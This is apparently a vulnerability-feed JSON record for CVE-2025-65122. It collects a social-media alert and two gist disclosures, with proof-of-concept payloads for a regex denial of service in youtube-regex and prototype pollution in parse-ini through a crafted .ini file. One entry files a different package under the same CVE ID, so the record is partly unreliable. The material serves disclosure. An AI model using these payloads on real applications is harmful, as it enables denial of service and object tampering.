{"vulnerability": "CVE-2025-65122", "sightings": [{"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"}, {"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now();\nlet payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now();\nconsole.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"}, {"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n[MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}]}